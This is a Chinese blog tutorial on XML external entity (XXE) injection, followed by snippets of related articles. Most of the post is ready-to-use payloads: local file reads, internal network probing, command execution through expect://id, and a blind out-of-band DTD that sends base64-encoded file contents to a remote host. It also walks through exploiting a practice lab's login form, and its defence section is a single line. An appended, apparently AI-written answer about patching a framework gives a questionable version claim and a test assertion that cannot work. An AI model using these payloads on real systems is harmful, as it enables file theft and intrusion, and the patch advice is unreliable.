XXE漏洞

已于 2023-04-26 17:26:33 修改
阅读量186 收藏
点赞数
分类专栏: 网络安全-渗透篇 文章标签: 安全 web安全 网络
于 2023-04-26 17:22:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Massimo__JAVA/article/details/130385386
版权

一、介绍

XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

二、XML与HMTL的区别

XML被设计为传输和存储数据,其焦点是数据的内容。
HTML被设计用来显示数据,其焦点是数据的外观。
HTML旨在显示信息,而XML旨在传输信息。

三、漏洞利用

1)读文件
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "file:///c:/11.txt" >
]>
<foo>&xxe;</foo>

在这里插入图片描述
该文件要真实存在

2)内网探针或攻击内网应用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "http://192.168.116.124/index.txt" >
]>
<foo>&xxe;</foo>
3)RCE

该漏洞是在安装expect扩展的php环境里执行系统命令
id 为执行的命令

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE ANY [
	<!ENTITY  xxe SYSTEM "expect://id" >
]>
<foo>&xxe;</foo>
4)引入外部实体dtd

主要用来绕过或实现自定义的一种攻击
evil.dtd 可以简单理解为xml的一个格式文件
evil.dtd

<!ENTITY send SYSTEM "file:///c:/11.txt">

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test [
	<!ENTITY  % file SYSTEM "http://192.168.116.124/evil.dtd" >
	%file;
]>
<foo>&send;</foo>

上面的代码就是将evil.dtd里的内容当作xml来执行

5)无回显读文件

test.dtd

<!ENTITY % payload
	"<ENTITY &#x25; send SYSTEM 'http://192.168.116.124/?data=%file;'>"
>

%payload;

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test [
	<!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/test.txt" >
	<!ENTITY % dtd SYSTEM "http://192.168.116.124/test.dtd">
	%dtd;
	%send;
]>
6)无回显+dnslog.cn

访问dnslog.cn(http://dnslog.cn),生成一个域名

payload:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY  xxe SYSTEM "http://pf7o7e.dnslog.cn" >
]>
<foo>&xxe;</foo>
7)伪协议-读文件(绕过)
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE ANY [
	<!ENTITY  f SYSTEM "php://filter/read=convert.base64-encode/resource=c:/11.txt" >
]>

<x>&f;</x>
8)xxe-lab靶场登录框xml数据传输测试-检测发现

在这里插入图片描述

随意输入账号/密码,登录,抓包

在这里插入图片描述发送到爬虫模块,然后在历史包中输入xml关键字过滤
在这里插入图片描述
得到有漏洞的数据包
在这里插入图片描述构造payload

在这里插入图片描述
payload:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE Mikasa [
	<!ENTITY test SYSTEM "file:///c:/11.txt">
]>

<user><username>&test;</username><password>Mikasa</password></user>

四、防御

XML解析库在调用时严格禁止对外部实体的解析。

XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
XXE漏洞(下)
errorr0
04-10 1331
XXE注入攻击
Web安全XXE漏洞
zkaqlaoniao的博客
11-24 1971
XXE漏洞指的是XML外部实体注入(XML External Entity Injection)漏洞,它是一种常见的安全漏洞类型,可以用来攻击基于XML的应用程序。当应用程序接受XML输入时,攻击者可以插入带有外部实体引用的恶意XML数据,从而导致应用程序执行未经授权的操作,比如访问本地文件系统、执行远程代码等。攻击者可以通过利用XXE漏洞来获取敏感信息、控制服务器,或者执行其他恶意操作。
xxe漏洞(xml外部实体注入漏洞)
xiaoheizi的博客
06-10 569
在知道存在回显后,可以尝试读取一些敏感目录,比如读取c:/windows/win.ini,它是每个windows系统都有的,linux系统的的话可以读取/etc/passwd,当然想要读取其他文件目录,只需更改绝对路径即可(file://协议只能用绝对路径)报错XXE是回显XXE攻击的一种特例,它与正常回显XXE的不同在于它在利用过程中服务器回显的是错误信息,可根据错误信息的不同判断是否注入成功。正常回显XXE是最传统的XXE攻击,在利用过程中服务器会直接回显信息,可直接完成XXE攻击。
什么是XXE漏洞
m0_57836225的博客
09-03 291
除了 GORM,还有一些其他的库也在一定程度上提供了类似 ORM 的功能,但可能在功能和使用方式上有所不同。选择合适的库通常取决于具体的项目需求和个人偏好。GORM 是一个功能强大的 Go 语言的 ORM 库,它支持 MySQL、PostgreSQL、SQLite、SQL Server 等多种数据库。
15.XXE漏洞
07-30 128
XML External Entity Injection xml外部实体注入 XXE 攻击原理:本质与sql注入,xss是一样的,都是没有过滤。对xml文件没有过滤。 xml原理 XML语言例子:随便了解一下,攻击中用到的不是特别多。 真正用到的是DTD DTD教XML如何做人。就像你教育自己的孩子一样。XML有什么功能由...
XXE漏洞总结
ma963852的博客
05-27 1039
搬运:未知攻焉知防——XXE漏洞攻防 - 博客 - 腾讯安全应急响应中心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以再XML文档内部声明,也可以外部引用。 内部声明DTD <根元素[声明元素]> 引用外部DTD <根元素 SY
cltphp xxe漏洞
最新发布
03-18
<think>好的,我现在需要处理用户关于CLTPHP框架中的XXE漏洞的问题。首先,我得先确认用户的需求是什么。用户想知道这个漏洞的相关信息以及修复方法和补丁。那我得先了解什么是XXE漏洞,以及它在CLTPHP中的具体表现。 XXE漏洞,全称是XML外部实体注入攻击。攻击者通过构造恶意的XML文件,利用外部实体来读取服务器上的敏感文件,甚至执行远程请求。这种漏洞通常发生在解析XML输入时没有禁用外部实体的情况下。所以,我需要检查CLTPHP在处理XML输入时的配置,看看是否存在这样的安全隐患。 接下来,我需要查找CLTPHP框架中是否存在这样的漏洞。可能需要查看其文档或历史漏洞记录。例如,是否在旧版本中存在未禁用外部实体的情况。如果存在,那么修复方法通常包括禁用外部实体、使用安全的XML解析器,或者过滤用户输入的XML内容。 修复步骤方面,首先应该禁用XML外部实体。在PHP中,可以使用libxml_disable_entity_loader(true)函数来实现。然后,确保使用的XML解析器(如SimpleXML或DOMDocument)配置正确,不解析外部实体。此外,对用户提交的XML数据进行过滤,比如移除DOCTYPE声明和ENTITY定义,防止恶意内容被解析。 关于补丁,用户可能需要升级到修复了该漏洞的CLTPHP版本。如果官方已经发布了补丁,应该建议用户及时更新。如果还没有,可能需要手动修改代码,应用上述修复措施。 另外,用户可能还需要了解如何验证修复是否有效。比如,通过构造测试用例,尝试读取系统文件,确认是否成功被拦截。同时,参考OWASP的相关建议,确保遵循最佳安全实践。 最后,生成相关问题,帮助用户深入理解XXE漏洞及其防护措施。例如,如何防范其他XML相关漏洞,或者在CLTPHP中其他常见的安全问题有哪些。 总结下来,我需要分步骤解释漏洞原理、在CLTPHP中的具体修复方法、补丁获取途径,并提供验证方法,确保用户能够全面应对这个问题。</think>### CLTPHP框架XXE漏洞解析与修复方案 XXE(XML External Entity)漏洞是XML解析器未禁用外部实体时产生的安全风险,攻击者可利用该漏洞读取服务器敏感文件或发起SSRF攻击[^1]。 #### 一、漏洞验证方法 ```php // 构造恶意XML请求示例 $payload = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'; $xml = simplexml_load_string($payload); echo $xml->asXML(); ``` 若输出包含系统文件内容,则存在漏洞[^2]。 #### 二、修复步骤 1. **禁用外部实体解析** ```php // 在框架入口文件添加 libxml_disable_entity_loader(true); ``` 2. **XML解析器安全配置** ```php // 使用DOMDocument时的安全设置 $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); ``` 3. **输入过滤处理** ```php // 过滤DOCTYPE声明 $xml = preg_replace('/<!DOCTYPE.*?>/i', '', $xml); ``` #### 三、补丁获取 CLTPHP官方已发布安全更新: - v5.5.1+版本包含修复补丁 - 升级命令: ```bash composer update cltphp/framework ``` #### 四、验证测试 ```php // 安全测试用例 $test_xml = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'; assert(strpos($test_xml, 'ENTITY') === false, "漏洞未完全修复"); ``` 建议同时检查框架的XML处理模块,包括: 1. 微信支付回调接口 2. 第三方API对接模块 3. 数据导入导出功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值